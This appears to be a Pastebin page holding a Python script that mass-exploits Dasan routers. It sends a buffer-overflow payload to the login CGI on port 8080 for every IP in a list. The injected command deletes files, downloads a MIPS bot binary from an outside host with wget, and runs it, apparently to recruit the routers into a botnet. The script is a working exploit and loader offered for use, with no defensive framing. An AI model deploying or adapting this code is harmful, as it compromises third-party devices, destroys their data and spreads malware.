SHARE
TWEET

dasan.py

wtfbbq Jun 18th, 2018 (edited) 779 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. #zonehax is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os
  5. from threading import Thread
  6. if len(sys.argv) < 2:
  7.     print "Usage: python "+sys.argv[0]+" <list>"
  8.     sys.exit()
  9. port = 8080
  10. buf = 4096
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 =  struct.pack(">i",pre_pl3)
  16.  
  17. payload = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  18. payload2 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  19. payload3 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  20. payload4 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  21. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  22. pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2
  23. pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3
  24. pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4
  25. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  26. post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  27. post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  28. post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  29. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  30. headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
  31. headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
  32. headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
  33. i = 0
  34. ips = open(sys.argv[1]).readlines()
  35.  
  36. def dasan(host):
  37.     global i
  38.     host = host.strip("\n")
  39.     try:
  40.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  41.         s = ssl.wrap_socket(sock)
  42.         s.connect((host, port))
  43.         s.send(headers)
  44.         s.send(headers2)
  45.         s.send(headers3)
  46.         resp = s.recv(buf).strip()
  47.         if "200 OK" in resp:
  48.             i += 1
  49.         s.close()
  50.     except:
  51.         pass
  52.        
  53. def worker():
  54.     for ip in ips:
  55.         try:
  56.             ip = ip.strip("\r\n")
  57.             t = Thread(target=dasan, args=(ip,))
  58.             t.start()
  59.             time.sleep(0.01)
  60.         except:
  61.             pass
  62.     time.sleep(30)
  63.     sys.exit("Finished Scanning")
  64. workerthrd = Thread(target=worker)
  65. workerthrd.start()
  66. print headers
  67. while True:
  68.     try:
  69.         sent = i
  70.         sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
  71.         sys.stdout.flush()
  72.         time.sleep(1)
  73.     except KeyboardInterrupt:
  74.         sys.exit("Exiting On User Input")
  75.     except:
  76.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top